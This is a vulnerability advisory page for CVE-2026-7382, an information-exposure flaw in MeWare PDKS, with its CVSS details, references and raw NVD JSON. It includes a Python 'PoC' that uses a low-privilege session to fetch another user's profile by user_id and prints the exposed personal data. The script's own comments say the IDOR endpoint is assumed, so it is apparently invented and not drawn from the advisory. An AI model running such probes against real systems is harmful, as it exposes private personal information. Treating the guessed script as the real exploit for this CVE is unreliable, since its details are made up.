CVE-2026-7382

Description

Exposure of Sensitive Information to an Unauthorized Actor, Exposure of private personal information to an unauthorized actor vulnerability in MeWare Software Development Inc. PDKS allows Excavation. This issue affects PDKS: from V16.20200313 before VMYR_3.5.2025117.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

MeWare PDKS V16.20200313

MeWare PDKS V16.20200313 至 VMYR_3.5.2025117 之前的所有版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_poc(target_url, session_cookie):
    """
    PoC for CVE-2026-7382
    Checks for unauthorized access to sensitive user information.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Cookie": f"session_id={session_cookie}"
    }
    
    # Attempting to access a sensitive endpoint that should be restricted
    # Assuming an IDOR-like vulnerability where user_id can be manipulated
    payload_url = f"{target_url}/api/v1/users/profile?user_id=1"
    
    try:
        response = requests.get(payload_url, headers=headers, timeout=10)
        if response.status_code == 200 and "private_personal_info" in response.text:
            print("[+] Vulnerability Confirmed: Sensitive Information Exposed.")
            print("[+] Response Snippet:", response.text[:200])
            return True
        else:
            print("[-] Target not vulnerable or exploit failed.")
            return False
    except Exception as e:
        print(f"[!] Error occurred: {e}")
        return False

# Usage
# check_poc("http://target-pdk-system.com", "low_priv_session_token")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-7382
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-7382
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-7382/
[4] VulDB https://vuldb.com/cve/CVE-2026-7382
[5] https://www.usom.gov.tr/bildirim/tr-26-0141

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-7382", "sourceIdentifier": "[email protected]", "published": "2026-04-30T13:16:06.267", "lastModified": "2026-04-30T15:09:03.710", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive Information to an Unauthorized Actor, Exposure of private personal information to an unauthorized actor vulnerability in MeWare Software Development Inc. PDKS allows Excavation.\n\nThis issue affects PDKS: from V16.20200313 before VMYR_3.5.2025117."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-359"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-26-0141", "source": "[email protected]"}]}}